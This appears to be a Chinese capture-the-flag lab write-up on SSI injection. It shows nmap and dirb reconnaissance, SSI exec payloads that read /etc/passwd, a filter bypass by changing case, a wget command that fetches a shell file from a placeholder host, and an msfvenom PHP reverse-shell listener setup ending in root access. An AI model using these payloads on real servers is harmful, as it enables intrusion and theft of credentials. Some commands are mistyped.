ssi注入

 

ssi注入就是寻找一个输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令。

如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" --> 

切换目录<!--#exec cmd="cd /root/dir/" -->

 

像正常一样先ifconfig扫描出自己的IP,然后nmap -sV 攻击机IP 可以得到靶机的IP以及开放的端口及相关信息。

看到靶机开放了http服务的80端口,使用dirb探测敏感信息

然后通过robot.txt的链接,/spukcab/,

用它代替robot,txt得到两个文件index,bak     oldconfig.bak,下载下来用终端打开

得到一系列的代码文,不知道有没有用,把两个全cat下来。

除此之外还有

这个东西和SSI注入的格式一样,比较敏感,双引号里面是对应的Linux命令,通过这个命令我们能获得当前系统的用户名及其密码

 

接下来要用SSI注入漏洞

刚才我们尝试的链接,出现这个登陆的页面,我们打开,

把这个复制到target和feedback里        <--#exec cmd="cat/etc/passwd/"-->

也可以把execbiancheng 大写,

登录成功

出现的是我们刚才复制的Linux命令,

然后我们返回刚才登陆的页面,把feedback那一栏--前加个!得到

返回了etc文件的效果以及内容

下一步

下载shell脚本并重命名 <!--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" --> 

制作webshell:

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php


打开metasploit启动监听:

msfconsole

然后设置参数

设置完之后输入run

然后下载Python脚本,

并重命名为shell.php
<!--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" -->

即在登录页面输入,1    和上式

把shell.py移到/var/www/html/ 的根目录下

查看当前目录信息

 

开启apache服务,然后service apache status查看是否开启。

 

查看是否返回shell

 

刚才将L命令大小写转换绕过过滤机制,上传shell,反弹shell,

然后还要赋予shell.php权限 chomd 777 shell.php

 

执行shell后命令:sysinfo 查看系统信息 ;

shell 进去系统shell;发现和以前不太相同

 

python优化shell

优化后,

我们cd/root/

ls

cat flag

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值